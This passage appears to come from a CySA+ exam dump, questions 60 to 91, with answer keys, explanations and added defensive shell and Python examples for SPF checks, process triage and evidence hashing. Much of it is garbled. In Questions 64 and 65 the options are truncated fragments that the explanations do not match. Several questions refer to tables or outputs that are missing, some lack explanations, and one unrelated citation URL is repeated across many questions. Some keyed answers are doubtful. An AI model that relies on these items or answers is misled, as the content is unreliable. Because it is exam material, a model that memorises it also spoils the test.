strengths, weaknesses, gaps, or best practices. Identifying areas of improvement in the incident response
process can help enhance the security posture, readiness, or capability of the organization for future
incidents, as well as provide feedback or recommendations on how to address any issues or challenges.

QUESTION 60
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans.
Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:

Additionally, the vulnerability management team feels that the metrics Smear and Channing are less
important than the others, so these will be lower in priority. Which of the following vulnerabilities should be
patched first, given the above third-party scoring system?
A. InLoud:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: Yes
Channing: No
B. TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No
C. ENameless:
Cobain: Yes
Grohl: No
Novo: Yes
Smear: No
Channing: No
D. PBleach:
Cobain: Yes
Grohl: No
Novo: No
Smear: No
Channing: Yes

Correct Answer: B
Explanation

Explanation/Reference:
The vulnerability that should be patched first, given the above third-party scoring system, is TSpirit
(Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No). It is the only entry with all three of the
higher-priority metrics (Cobain, Grohl, and Novo) set to Yes. InLoud also has three Yes values, but one of
them is Smear, which the vulnerability management team ranks lower; ENameless has only two of the
higher-priority metrics, and PBleach has one plus Channing. Therefore TSpirit poses the greatest risk under
this scoring system and should be patched first.
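Added example (not from the original page): Python that applies the question's third-party metrics as a
weighted score and returns the patch order. The weights are an assumption that encodes the team's
statement that Smear and Channing matter less; the metric values are those in the answer choices.

```python
# Weights are an assumption for the example: the team said Smear and Channing matter
# less, so they count half as much as Cobain, Grohl and Novo.
WEIGHTS = {"Cobain": 2, "Grohl": 2, "Novo": 2, "Smear": 1, "Channing": 1}

# The four vulnerabilities exactly as listed in the answer choices.
VULNS = {
    "InLoud":    {"Cobain": True,  "Grohl": False, "Novo": True,  "Smear": True,  "Channing": False},
    "TSpirit":   {"Cobain": True,  "Grohl": True,  "Novo": True,  "Smear": False, "Channing": False},
    "ENameless": {"Cobain": True,  "Grohl": False, "Novo": True,  "Smear": False, "Channing": False},
    "PBleach":   {"Cobain": True,  "Grohl": False, "Novo": False, "Smear": False, "Channing": True},
}


def score(metrics, weights=WEIGHTS):
    """Weighted sum of the metrics that are set; unknown metric names are rejected."""
    unknown = set(metrics) - set(weights)
    if unknown:
        raise ValueError(f"unknown metrics: {sorted(unknown)}")
    return sum(weights[m] for m, flagged in metrics.items() if flagged)


def patch_order(vulns, weights=WEIGHTS):
    """Names sorted by descending score; ties go to the entry with more top-weight metrics."""
    top = max(weights.values())

    def key(name):
        m = vulns[name]
        high = sum(1 for k, v in m.items() if v and weights[k] == top)
        return (-score(m, weights), -high, name)

    return sorted(vulns, key=key)


if __name__ == "__main__":
    for name in patch_order(VULNS):
        print(f"{name:10} score={score(VULNS[name])}")
```

A plain count of Yes values would tie InLoud with TSpirit; the weights are what turn the team's stated
priorities into a repeatable ordering, and rejecting unknown metric names stops a renamed column in next
week's report from silently scoring as zero.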

QUESTION 61
A user downloads software that contains malware onto a computer that eventually infects numerous other
systems. Which of the following has the user become?

A. Hacktivist
B. Advanced persistent threat
C. Insider threat
D. Script kiddie

Correct Answer: C
Explanation

Explanation/Reference:
The user has become an insider threat by downloading software that contains malware onto a computer
that eventually infects numerous other systems. An insider threat is a person or entity that has authorized
access to an organization's systems, data, or resources and uses that access, deliberately or not, to cause
harm or damage to the organization. An insider threat can be intentional or unintentional, malicious or
negligent, and can result from various actions or behaviors, such as downloading unauthorized software,
violating security policies, stealing data, sabotaging systems, or collaborating with external attackers.

QUESTION 62
An organization has activated the CSIRT. A security analyst believes a single virtual server was
compromised and immediately isolated from the network. Which of the following should the CSIRT conduct
next?

A. Take a snapshot of the compromised server and verify its integrity
B. Restore the affected server to remove any malware
C. Contact the appropriate government agency to investigate
D. Research the malware strain to perform attribution

Correct Answer: A
Explanation

Explanation/Reference:
The next action that the CSIRT should conduct after isolating the compromised server from the network is
to take a snapshot of the compromised server and verify its integrity. Taking a snapshot of the
compromised server involves creating an exact copy or image of the server at a specific point in time.
Verifying its integrity involves ensuring that the snapshot has not been altered, corrupted, or tampered
with during or after its creation. Taking a snapshot and verifying its integrity can help preserve and
protect any evidence or information related to the incident, as well as prevent any tampering,
contamination, or destruction of evidence.

QUESTION 63
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following
must be collected first in a computer system, related to its volatility level?

A. Disk contents
B. Backup data
C. Temporary files
D. Running processes

Correct Answer: D
Explanation

Explanation/Reference:
The most volatile type of evidence that must be collected first in a computer system is running processes.
Running processes are programs or applications that are currently executing on a computer system and
using its resources, such as memory, CPU, disk space, or network bandwidth. Running processes are very
volatile because they can change rapidly or disappear completely when the system is shut down, rebooted,
logged off, or crashed. Running processes can also be affected by other processes or users that may
modify or terminate them. Therefore, running processes must be collected first before any other type of
evidence in a computer system.

QUESTION 64
A security analyst is trying to identify possible network addresses from different source networks belonging
to the same company and region.

Which of the following shell script functions could help achieve the goal?

A. function x() { b=traceroute -m"" }
B. "u.com TXT +short }
C. function z() { c=$(geoip" }

Correct Answer: B
Explanation

Explanation/Reference:
The shell script function that could help identify possible network addresses from different source networks
belonging to the same company and region is:

"u.com TXT +short }

This function takes an IP address as an argument and performs two DNS lookups using the dig command.
The first lookup uses the -x option to perform a reverse DNS lookup and get the hostname associated with
the IP address. The second lookup uses the origin.asn.cymru.com domain to get the autonomous system
number (ASN) and other information related to the IP address, such as the country code, registry, or
allocation date. The function then prints the IP address and the ASN information, which can help identify
any network addresses that belong to the same ASN or region.

QUESTION 65
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the
following functions would help the analyst achieve the objective?

A. function w() { info=$(pi" " }
B. function x() { info=$(geoipl" }
C. function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && " }
D. function z() { info=$(tracer""" }

Correct Answer: B
Explanation

Explanation/Reference:
The function that would help the analyst identify IP addresses from the same country is:
function x() { info=$(geoiplookup $" }
This function takes an IP address as an argument and uses the geoiplookup command to get the
geographic location information associated with the IP address, such as the country name, country code,
region, city, or latitude and longitude. The function then prints the IP address and the geographic location
information, which can help identify any IP addresses that belong to the same country.

QUESTION 66
A security analyst obtained the following table of results from a recent vulnerability assessment that was
conducted against a single web server in the environment:

Which of the following should be completed first to remediate the findings?

A. Ask the web development team to update the page contents
B. Add the IP address allow listing for control panel access
C. Purchase an appropriate certificate from a trusted root CA
D. Perform proper sanitization on all fields

Correct Answer: D
Explanation

Explanation/Reference:
The first action that should be completed to remediate the findings is to perform proper sanitization on all
fields. Sanitization is a process that involves validating, filtering, or encoding any user input or data before
processing or storing it on a system or application. Sanitization can help prevent various types of attacks,
such as cross-site scripting (XSS), SQL injection, or command injection, that exploit unsanitized input or
data to execute malicious scripts, commands, or queries on a system or application. Performing proper
sanitization on all fields can help address the most critical and common vulnerability found during the
vulnerability assessment, which is XSS.

QUESTION 67
A user reports a malware alert to the help desk. A technician verifies the alert, determines the workstation
is classified as a low-severity device, and uses network controls to block access. The technician then
assigns the ticket to a security analyst who will complete the eradication and recovery processes. Which of
the following should the security analyst do next?

A. Document the procedures and walk through the incident training guide.
B. Reverse engineer the malware to determine its purpose and risk to the organization.
C. Sanitize the workstation and verify countermeasures are restored.
D. Isolate the workstation and issue a new computer to the user.

Correct Answer: C
Explanation

Explanation/Reference:
Sanitizing the workstation and verifying countermeasures are restored are part of the eradication and
recovery processes that the security analyst should perform next. Eradication is the process of removing
malware or other threats from the affected systems, while recovery is the process of restoring normal
operations and functionality to the affected systems. Sanitizing the workstation can involve deleting or
wiping any malicious files or programs, while verifying countermeasures are restored can involve checking
and updating any security controls or settings that may have been compromised.
https://www.cynet.com/incident-response/incident-response-sans-the-6-steps-in-depth/

QUESTION 68
A digital forensics investigator works from duplicate images to preserve the integrity of the original
evidence. Which of the following types of media are most volatile and should be preserved? (Select two).

A. Memory cache
B. Registry file
C. SSD storage
D. Temporary filesystems
E. Packet decoding
F. Swap volume

Correct Answer: AF
Explanation

Explanation/Reference:
Memory cache and swap volume are types of media that are most volatile and should be preserved during
a digital forensics investigation. Volatile media are those that store data temporarily and lose their contents
when the power is turned off or interrupted. Memory cache is a small and fast memory that stores
frequently used data or instructions for faster access by the processor. Swap volume is a part of the hard
disk that is used as an extension of the memory when the memory is full or low.
https://www.techopedia.com/definition39/memory-dump

QUESTION 69
A development team recently released a new version of a public-facing website for testing prior to
production. The development team is soliciting the help of various teams to validate the functionality of the
website due to its high visibility.
Which of the following activities best describes the process the development team is initiating?

A. Static analysis
B. Stress testing
C. Code review
D. User acceptance testing

Correct Answer: D
Explanation

Explanation/Reference:
User acceptance testing is a process of verifying that a software application meets the requirements and
expectations of the end users before it is released to production. User acceptance testing can help to
validate the functionality, usability, performance and compatibility of the software application with real-
world scenarios and feedback. User acceptance testing can involve various teams, such as developers,
testers, customers and stakeholders. https://www.techopedia.com/definition7/user-acceptance-testing-uat

QUESTION 70
A security technician is testing a solution that will prevent outside entities from spoofing the company's
email domain, which is comptia.org. The testing is successful, and the security technician is prepared to
fully implement the solution.
Which of the following actions should the technician take to accomplish this task?

A. Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the DNS record.
B. Add TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the email server.
C. Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the domain controller.
D. Add TXT @ "v=spf1 mx include:_spf.comptia.org +all" to the web server.

Correct Answer: A
Explanation

Explanation/Reference:
Adding TXT @ "v=spf1 mx include:_spf.comptia.org -all" to the DNS record can help to prevent outside
entities from spoofing the company's email domain, which is comptia.org. This is an example of a Sender
Policy Framework (SPF) record, which is a type of DNS record that specifies which mail servers are
authorized to send email on behalf of a domain. SPF records can help to prevent spoofing by allowing the
recipient mail servers to check whether the sending server is listed as authorized. The "-all" at the end of
the SPF record indicates that any mail server that is not listed in the SPF record is not authorized to send
email for comptia.org.
https://www.cloudflare.com/learning/ssl/what-is-domain-spoofing/
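
The checks the explanation relies on (the record must start with v=spf1, must end with an "all" mechanism, and "+all" authorizes everyone) can be applied to a record string before it is published. The following POSIX shell function is an added example, not part of the exam dump or of CompTIA's material; it encodes the RFC 7208 rules, including the limit of 10 DNS-lookup terms (include, a, mx, ptr, exists, redirect), and the records in demo() are constructed for the example. The function names spf_check and demo are chosen here.

```shell
#!/bin/sh
# Added example (not from the exam dump): offline sanity check of an SPF TXT
# record. Rules taken from RFC 7208: the record begins with "v=spf1", should
# end with an "all" mechanism, and may use at most 10 DNS-lookup terms.

spf_check() {
    # Usage: spf_check '<spf record text>'
    # Prints one finding per line. Returns 0 when the record is acceptable
    # (warnings allowed) and 1 when it is unsafe or malformed.
    status=0
    lookups=0
    all_seen=""
    set -- $1                       # split the record on whitespace into terms
    if [ "$1" != "v=spf1" ]; then
        echo "FAIL: record must begin with v=spf1 (got '$1')"
        status=1
    fi
    shift
    for term in "$@"; do
        qual=""
        mech=$term
        case "$term" in
            [+~?-]*) qual=${term%"${term#?}"}; mech=${term#?} ;;   # split "-all" into "-" and "all"
        esac
        case "$mech" in
            all)
                all_seen=1
                case "$qual" in
                    -)   echo "OK: '-all' rejects senders not listed in the record" ;;
                    "~") echo "WARN: '~all' only soft-fails unlisted senders" ;;
                    "?") echo "WARN: '?all' is neutral and gives no protection" ;;
                    *)   echo "FAIL: '${qual}all' lets any host send as this domain"; status=1 ;;
                esac ;;
            include:)
                echo "FAIL: 'include:' has no domain (stray space in the record?)"; status=1 ;;
            include:*|a|a:*|a/*|mx|mx:*|mx/*|ptr|ptr:*|exists:*|redirect=*)
                lookups=$((lookups + 1)) ;;      # these cost a DNS lookup when evaluated
            ip4:*|ip6:*|exp=*)
                ;;                                # literal networks and the exp modifier do not
            *)
                echo "WARN: unrecognised term '$term'" ;;
        esac
    done
    if [ -z "$all_seen" ]; then
        echo "FAIL: no terminating 'all' mechanism"; status=1
    fi
    if [ "$lookups" -gt 10 ]; then
        echo "FAIL: $lookups DNS-lookup terms exceed the RFC 7208 limit of 10"; status=1
    fi
    return "$status"
}

demo() {
    # Constructed records: the one from the question as it should be published,
    # and a "+all" variant that must be rejected.
    spf_check 'v=spf1 mx include:_spf.comptia.org -all' || return 1
    if spf_check 'v=spf1 mx include:_spf.comptia.org +all'; then return 1; fi
    return 0
}

demo
```

Run it as `sh spf_check.sh`; the demo prints an OK line for the "-all" record and a FAIL line for the "+all" variant. The version-tag check also catches the easy-to-miss typo of a letter "l" in place of the digit "1", which would make receivers ignore the record entirely.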

QUESTION 71
A security analyst who works in the SOC receives a new requirement to monitor for indicators of
compromise. Which of the following is the first action the analyst should take in this situation?

A. Develop a dashboard to track the indicators of compromise.
B. Develop a query to search for the indicators of compromise.
C. Develop a new signature to alert on the indicators of compromise.
D. Develop a new signature to block the indicators of compromise.

Correct Answer: B
Explanation

Explanation/Reference:
Developing a query to search for the indicators of compromise is the first action the analyst should take in
this situation. Indicators of compromise (IOCs) are pieces of information that suggest a system or network
has been compromised by an attacker. IOCs can include IP addresses, domain names, file hashes, URLs,
or other artifacts that are associated with malicious activity. Developing a query to search for IOCs can
help to identify any potential incidents or threats in the environment and initiate further investigation or
response .
https://www.crowdstrike.com/cybersecurity-101/incident-response/indicators-ofcompromise/

QUESTION 72
During an investigation, an analyst discovers the following rule in an executive's email client:
The executive is not aware of this rule. Which of the following should the analyst do first to evaluate the
potential impact of this security incident?

A. Check the server logs to evaluate which emails were sent to <someaddress@domain.com>.
B. Use the SIEM to correlate logging events from the email server and the domain server.
C. Remove the rule from the email client and change the password.
D. Recommend that the management team implement SPF and DKIM.

Correct Answer: C
Explanation

QUESTION 73
A security analyst is investigating a compromised Linux server. The analyst issues the ps command and
receives the following output:

Which of the following commands should the administrator run next to further analyze the compromised
system?

A. gdb /proc/1301
B. rpm -V openssh-server
C. /bin/ls -l /proc/1301/exe
D. kill -9 1301

Correct Answer: C
Explanation

Explanation/Reference:
/bin/ls -l /proc/1301/exe is the command that will show the absolute path to the executed binary file
associated with the process ID 1301, which is /usr/sbin/sshd. This information can help the security analyst
determine whether the binary is an official version and has not been modified, which could be an indicator
of compromise. /proc/1301/exe is a special symbolic link that points to the executable file that was used to
start process 1301.
https://unix.stackexchange.com/questions854/how-does-the-proc-pid-exe-symlinkdiffer-from-ordinary-symlinks
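
The /proc/<pid>/exe link described above is also useful in bulk: Linux appends " (deleted)" to the link target when the binary a process was started from has since been removed from disk, which is how a process running from an unlinked file shows up during triage. The following POSIX shell functions are an added example, not code from the exam dump or from CompTIA; they assume Linux procfs and the coreutils readlink command, and the function names are chosen here.

```shell
#!/bin/sh
# Added example (not from the exam dump): resolve /proc/<pid>/exe and flag
# processes whose on-disk binary is gone. Assumes Linux procfs and readlink.

proc_exe_check() {
    # Usage: proc_exe_check <pid>
    # Prints "<pid> <path> <state>" where state is ONDISK, DELETED or
    # UNREADABLE (kernel threads, nonexistent pids, and other users' processes
    # without root). Returns 0 for ONDISK, 1 for DELETED, 2 for UNREADABLE.
    pid=$1
    target=$(readlink "/proc/$pid/exe" 2>/dev/null) || { echo "$pid ? UNREADABLE"; return 2; }
    case "$target" in
        *' (deleted)') echo "$pid ${target%" (deleted)"} DELETED"; return 1 ;;
    esac
    echo "$pid $target ONDISK"
    return 0
}

proc_exe_state() {
    # Prints only the state word for one pid (last field of the report line).
    proc_exe_check "$1" | awk '{ print $NF }'
}

scan_deleted_exes() {
    # Walks every pid in /proc, prints the ones whose executable was deleted,
    # and returns how many were found (0 means nothing to look at).
    found=0
    for d in /proc/[0-9]*; do
        p=${d#/proc/}
        out=$(proc_exe_check "$p" || true)
        case "$out" in
            *DELETED) echo "$out"; found=$((found + 1)) ;;
        esac
    done
    return "$found"
}

# Report on the shell running this script, then sweep the whole process table.
proc_exe_check $$
scan_deleted_exes
```

A DELETED hit is a lead, not a verdict: package upgrades also leave long-running daemons pointing at a replaced binary until they restart. For an ONDISK path, the next step the question's option B hints at is to confirm the file still matches its package (rpm -V <package> on RPM systems, dpkg --verify on Debian-based systems) before trusting it.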

QUESTION 74
The following output is from a tcpdump at the edge of the corporate network:
Which of the following best describes the potential security concern?

A. Payload lengths may be used to overflow buffers enabling code execution.
B. Encapsulated traffic may evade security monitoring and defenses
C. This traffic exhibits a reconnaissance technique to create network footprints.
D. The content of the traffic payload may permit VLAN hopping.

Correct Answer: B
Explanation

Explanation/Reference:
Encapsulated traffic may evade security monitoring and defenses by hiding or obfuscating the actual
content or source of the traffic. Encapsulation is a technique that wraps data packets with additional
headers or protocols to enable communication across different network types or layers. Encapsulation can
be used for legitimate purposes, such as tunneling, VPNs, or NAT, but it can also be used by attackers to
bypass security controls or detection mechanisms that are not able to inspect or analyze the encapsulated
traffic.
https://www.techopedia.com/definition39/memory-dump

QUESTION 75
A company's threat team has been reviewing recent security incidents and looking for a common theme.
The team discovered the incidents were caused by incorrect configurations on the impacted systems. The
issues were reported to support teams, but no action was taken. Which of the following is the next step the
company should take to ensure any future issues are remediated?

A. Require support teams to develop a corrective control that ensures security failures are addressed
once they are identified.
B. Require support teams to develop a preventive control that ensures new systems are built with the
required security configurations.
C. Require support teams to develop a detective control that ensures they continuously assess systems
for configuration errors.
D. Require support teams to develop a managerial control that ensures systems have a documented
configuration baseline.

Correct Answer: A
Explanation

Explanation/Reference:
Requiring support teams to develop a corrective control that ensures security failures are addressed once
they are identified is the best step to ensure that any future issues are remediated. Corrective controls are
actions or mechanisms that are implemented after a security incident or failure has occurred to fix or
restore the normal state of the system or network. Corrective controls can include patching, updating,
repairing, restoring, or reconfiguring systems or components that were affected by the incident or failure.
https://www.techopedia.com/definition39/memory-dump

QUESTION 76
A product manager is working with an analyst to design a new application that will perform as a data
analytics platform and will be accessible via a web browser. The product manager suggests using a PaaS
provider to host the application.
Which of the following is a security concern when using a PaaS solution?

A. The use of infrastructure-as-code capabilities leads to an increased attack surface.
B. Patching the underlying application server becomes the responsibility of the client.
C. The application is unable to use encryption at the database level.
D. Insecure application programming interfaces can lead to data compromise.

Correct Answer: D
Explanation

Explanation/Reference:
Insecure application programming interfaces (APIs) can lead to data compromise when using a PaaS
solution. APIs are interfaces that allow applications to communicate with each other and with the
underlying platform. APIs can expose sensitive data or functionality to unauthorized or malicious users if
they are not properly designed, implemented, or secured. Insecure APIs can result in data breaches,
denial of service, unauthorized access, or code injection.
https://spot.io/resources/cloud-security/paas-security-threats-solutions-and-bestpractices/

QUESTION 77
A security analyst performs a weekly vulnerability scan on a network that has 240 devices and receives a
report with 2,450 pages. Which of the following would most likely decrease the number of false positives?

A. Manual validation
B. Penetration testing
C. A known-environment assessment
D. Credentialed scanning

Correct Answer: D
Explanation

Explanation/Reference:
Credentialed scanning is a method of vulnerability scanning that uses valid user credentials to access the
target systems and perform a more thorough and accurate assessment of their security posture.
Credentialed scanning can help to reduce the number of false positives by allowing the scanner to access
more information and resources on the systems, such as configuration files, registry keys, installed
software, patches, and permissions.
https://www.tenable.com/blog/credentialed-vulnerability-scanning-what-why-and-how

QUESTION 78
An organization wants to move non-essential services into a cloud computing environment. The
management team has a cost focus and would like to achieve a recovery time objective of 12 hours. Which
of the following cloud recovery strategies would work best to attain the desired outcome?

A. Duplicate all services in another instance and load balance between the instances.
B. Establish a hot site with active replication to another region within the same cloud provider.
C. Set up a warm disaster recovery site with the same cloud provider in a different region.
D. Configure the systems with a cold site at another cloud provider that can be used for failover.

Correct Answer: C
Explanation

Explanation/Reference:
Setting up a warm disaster recovery site with the same cloud provider in a different region can help to
achieve a recovery time objective (RTO) of 12 hours while keeping the costs low. A warm disaster
recovery site is a partially configured site that has some of the essential hardware and software
components ready to be activated in case of a disaster. A warm site can provide faster recovery than a
cold site, which has no preconfigured components, but lower costs than a hot site, which has fully
configured and replicated components. Using the same cloud provider can help to simplify the migration
and synchronization processes, while using a different region can help to avoid regional outages or
disasters.
https://www.techopedia.com/definition39/memory-dump

QUESTION 79
A security analyst discovers the company's website is vulnerable to cross-site scripting. Which of the
following solutions will best remedy the vulnerability?

A. Prepared statements
B. Server-side input validation
C. Client-side input encoding
D. Disabled JavaScript filtering

Correct Answer: B
Explanation

Explanation/Reference:
Server-side input validation is a solution that can prevent cross-site scripting (XSS) vulnerabilities by
checking and filtering any user input that is sent to the server before rendering it on a web page. Server-
side input validation can help to ensure that the user input conforms to the expected format, length and
type, and does not contain any malicious characters or syntax that may alter the logic or behavior of the
web page. Server-side input validation can also reject or sanitize any input that does not meet the
validation criteria.
https://portswigger.net/web-security/cross-site-scripting/preventing

QUESTION 80
An organization supports a large number of remote users. Which of the following is the best option to
protect the data on the remote users' laptops?

A. Require the use of VPNs.
B. Require employees to sign an NDA.
C. Implement a DLP solution.
D. Use whole disk encryption.

Correct Answer: D
Explanation

Explanation/Reference:
Using whole disk encryption is the best option to protect the data on the remote users' laptops. Whole disk
encryption is a technique that encrypts all data on a hard disk drive, including the operating system,
applications and files. Whole disk encryption can prevent unauthorized access to the data if the laptop is
lost, stolen or compromised. Whole disk encryption can also protect the data from physical attacks, such as
removing the hard disk and connecting it to another device.
https://www.techopedia.com/definition39/memory-dump

QUESTION 81
A security analyst is monitoring a company's network traffic and finds ping requests going to accounting
and human resources servers from a SQL server. Upon investigation, the analyst discovers a technician
responded to potential network connectivity issues. Which of the following is the best way for the security
analyst to respond?

A. Report this activity as a false positive, as the activity is legitimate.
B. Isolate the system and begin a forensic investigation to determine what was compromised.
C. Recommend network segmentation to the management team as a way to secure the various
environments.
D. Implement host-based firewalls on all systems to prevent ping sweeps in the future.

Correct Answer: A
Explanation

Explanation/Reference:
Reporting this activity as a false positive, as the activity is legitimate, is the best way for the security analyst
to respond. A false positive is a condition in which harmless traffic is classified as a potential network
attack by a security monitoring tool. Ping requests are a common network diagnostic tool that can be used
to test network connectivity issues. The technician who responded to potential network connectivity issues
was performing a legitimate task and did not pose any threat to the accounting and human resources
servers.
https://www.techopedia.com/definition39/memory-dump

QUESTION 82
Which of the following software assessment methods would test how an application performs during peak times?

A. Security regression testing
B. Stress testing
C. Static analysis testing
D. Dynamic analysis testing
E. User acceptance testing

Correct Answer: B
Explanation

Explanation/Reference:
Stress testing is a software assessment method that tests how an application performs under peak times
or extreme workloads. Stress testing can help to identify any performance issues, bottlenecks, errors or
crashes that may occur when an application faces high demand or concurrent users. Stress testing can
also help to determine the maximum capacity and scalability of an application.
https://www.techopedia.com/definition39/memory-dump

QUESTION 83
During an incident response procedure, a security analyst acquired the needed evidence from the hard
drive of a compromised machine. Which of the following actions should the analyst perform next to ensure
the data integrity of the evidence?

A. Generate hashes for each file from the hard drive.
B. Create a chain of custody document.
C. Determine a timeline of events using correct time synchronization.
D. Keep the cloned hard drive in a safe place.

Correct Answer: A
Explanation

Explanation/Reference:
Generating hashes for each file from the hard drive is the next action that the analyst should perform to
ensure the data integrity of the evidence. Hashing is a technique that produces a unique and fixed-length
value for a given input, such as a file or a message. Hashing can help to verify the data integrity of the
evidence by comparing the hash values of the original and copied files. If the hash values match, then the
evidence has not been altered or corrupted. If the hash values differ, then the evidence may have been
tampered with or damaged.

QUESTION 84
As a proactive threat-hunting technique, hunters must develop situational cases based on likely attack
scenarios derived from the available threat intelligence information. After forming the basis of the scenario,
which of the following may the threat hunter construct to establish a framework for threat assessment?

A. Critical asset list
B. Threat vector
C. Attack profile
D. Hypothesis

Correct Answer: D
Explanation

Explanation/Reference:
A hypothesis is a statement that can be tested by threat hunters to establish a framework for threat
assessment. A hypothesis is based on situational awareness and threat intelligence information, and
describes a possible attack scenario that may affect the organization. A hypothesis can help to guide threat
hunters in their investigation by providing a clear and specific question to answer, such as "Is there any
evidence of lateral movement?"
https://www.crowdstrike.com/blog/tech-center/threat-hunting-hypothesisdevelopment/

QUESTION 85
A company creates digitally signed packages for its devices. Which of the following best describes the
method by which the security packages are delivered to the company's customers?

A. Antitamper mechanism
B. SELinux
C. Trusted firmware updates
D. eFuse

Correct Answer: C
Explanation

Explanation/Reference:
Trusted firmware updates are the method by which the security packages are delivered to the company's
customers. Trusted firmware updates are digitally signed packages that contain software updates or patches
for devices, such as routers, switches, or firewalls. Trusted firmware updates can help to ensure the
authenticity and integrity of the packages by verifying the digital signature of the sender and preventing
unauthorized or malicious modifications to the packages.
https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_trustsec/configuration/xe-16/sec-usr-trustsec-xe-16-book/sec-trust-firm-upd.html

QUESTION 86
During an audit, several customer order forms were found to contain inconsistencies between the actual
price of an item and the amount charged to the customer. Further investigation narrowed the cause of the
issue to manipulation of the public-facing web form used by customers to order products. Which of the
following would be the best way to locate this issue?

A. Reduce the session timeout threshold
B. Deploy MFA for access to the web server.
C. Implement input validation.
D. Run a dynamic code analysis.

Correct Answer: D
Explanation

QUESTION 87
A Chief Information Security Officer (CISO) is concerned about new privacy regulations that apply to the
company. The CISO has tasked a security analyst with finding the proper control functions to verify that a
user's data is not altered without the user's consent. Which of the following would be an appropriate course
of action?

A. Automate the use of a hashing algorithm after verified users make changes to their data.
B. Use encryption first and then hash the data at regular, defined times.
C. Use a DLP product to monitor the data sets for unauthorized edits and changes.
D. Replicate the data sets at regular intervals and continuously compare the copies for unauthorized
changes.

Correct Answer: A
Explanation

Explanation/Reference:
Automating the use of a hashing algorithm after verified users make changes to their data is an appropriate
course of action to verify that a user's data is not altered without the user's consent. Hashing is a
technique that produces a unique and fixed-length value for a given input, such as a file or a message.
Hashing can help to verify the data integrity by comparing the hash values of the original and modified
data. If the hash values match, then the data has not been altered without the user's consent. If the hash
values differ, then the data may have been tampered with or corrupted.
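
The hash-and-compare workflow described for Question 83 (hashing acquired evidence) and Question 87 (re-hashing data after an authorised change, then comparing) is the same procedure, and it is easy to script. The following POSIX shell functions are an added example, not code from the exam dump or from CompTIA: make_manifest records a SHA-256 digest for every file under a directory, and verify_manifest later reports any file that is missing or no longer matches. It assumes sha256sum (GNU coreutils) or shasum is installed; the evidence files created in demo() are constructed for the example, and all function names are chosen here.

```shell
#!/bin/sh
# Added example (not from the exam dump): build a SHA-256 manifest of an
# evidence directory and re-verify the files against it later. Assumes
# sha256sum or shasum is available; sample files are constructed in demo().

sha256_of() {
    # Print only the hex digest of one file.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

make_manifest() {
    # Usage: make_manifest <evidence_dir> <manifest_file>
    # One line per file, "<digest>  <relative path>", sorted so the manifest
    # itself can be hashed and the value written on the chain-of-custody form.
    dir=$1; manifest=$2
    : > "$manifest"
    ( cd "$dir" && find . -type f | sort ) | while read -r f; do
        printf '%s  %s\n' "$(sha256_of "$dir/$f")" "$f" >> "$manifest"
    done
}

verify_manifest() {
    # Usage: verify_manifest <evidence_dir> <manifest_file>
    # Prints a MISSING or MODIFIED line per problem and returns the number of
    # problems, so exit status 0 means every file still matches its digest.
    dir=$1; manifest=$2; problems=0
    while read -r digest path; do
        if [ ! -f "$dir/$path" ]; then
            echo "MISSING  $path"; problems=$((problems + 1))
        elif [ "$(sha256_of "$dir/$path")" != "$digest" ]; then
            echo "MODIFIED $path"; problems=$((problems + 1))
        fi
    done < "$manifest"
    return "$problems"
}

demo() {
    # Constructed sample evidence: two small files in a temporary directory.
    work=$(mktemp -d) || return 1
    mkdir -p "$work/evidence/logs"
    printf 'constructed sample: auth.log line 1\n' > "$work/evidence/logs/auth.log"
    printf 'constructed sample: shell history\n'   > "$work/evidence/bash_history"

    make_manifest "$work/evidence" "$work/manifest.sha256"
    echo "--- manifest ---"; cat "$work/manifest.sha256"
    verify_manifest "$work/evidence" "$work/manifest.sha256" || { rm -rf "$work"; return 1; }
    echo "first verification: all files intact"

    # Simulate tampering after acquisition; verification must now fail.
    printf 'altered after imaging\n' >> "$work/evidence/bash_history"
    if verify_manifest "$work/evidence" "$work/manifest.sha256"; then
        rm -rf "$work"; return 1
    fi
    echo "second verification: tampering detected"
    rm -rf "$work"
    return 0
}

demo
```

Hash the manifest file itself and record that single value with the evidence; the per-file digests then prove which file changed, while the manifest's digest proves the list of files was not edited to hide a change. For a Question 87 style control, the same make_manifest step is re-run by the application after each verified user change and the stored manifest is replaced, so any later mismatch points to an edit that did not go through the consent path.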

QUESTION 88
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile
phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and
running some sort of protection against malicious software. Which of the following existing technical
controls should a security analyst recommend to best meet all the requirements?

A. EDR
B. Port security
C. NAC
D. Segmentation

Correct Answer: A
Explanation

Explanation/Reference:
EDR stands for endpoint detection and response, which is a type of security solution that monitors and
protects all devices that are connected to a network, such as laptops and mobile phones. EDR can help to
ensure that all devices are patched and running some sort of protection against malicious software by
providing continuous visibility, threat detection, incident response, and remediation capabilities. EDR can
also help to enforce security policies and compliance requirements across all devices.
https://www.crowdstrike.com/epp-101/what-is-endpoint-detection-and-response-edr/

QUESTION 89
A security analyst discovers the accounting department is hosting an accounts receivable form on a public
document service. Anyone with the link can access it. Which of the following threats applies to this
situation?

A. Potential data loss to external users
B. Loss of public/private key management
C. Cloud-based authentication attack
D. Identification and authentication failures

Correct Answer: A
Explanation

Explanation/Reference:
Potential data loss to external users is a threat that applies to this situation, where the accounting
department is hosting an accounts receivable form on a public document service. Anyone with the link can
access it. Data loss is an event that results in the destruction, corruption, or unauthorized disclosure of
sensitive or confidential data. Data loss can occur due to various reasons, such as human error, hardware
failure, malware infection, or cyberattack. In this case, hosting an accounts receivable form on a public
document service exposes the data to potential data loss to external users who may access it without
authorization or maliciously modify or delete it.

QUESTION 90
A security analyst is supporting an embedded software team. Which of the following is the best
recommendation to ensure proper error handling at runtime?

A. Perform static code analysis.
B. Require application fuzzing.
C. Enforce input validation.
D. Perform a code review.

Correct Answer: C
Explanation

QUESTION 91
The steering committee for information security management annually reviews the security incident
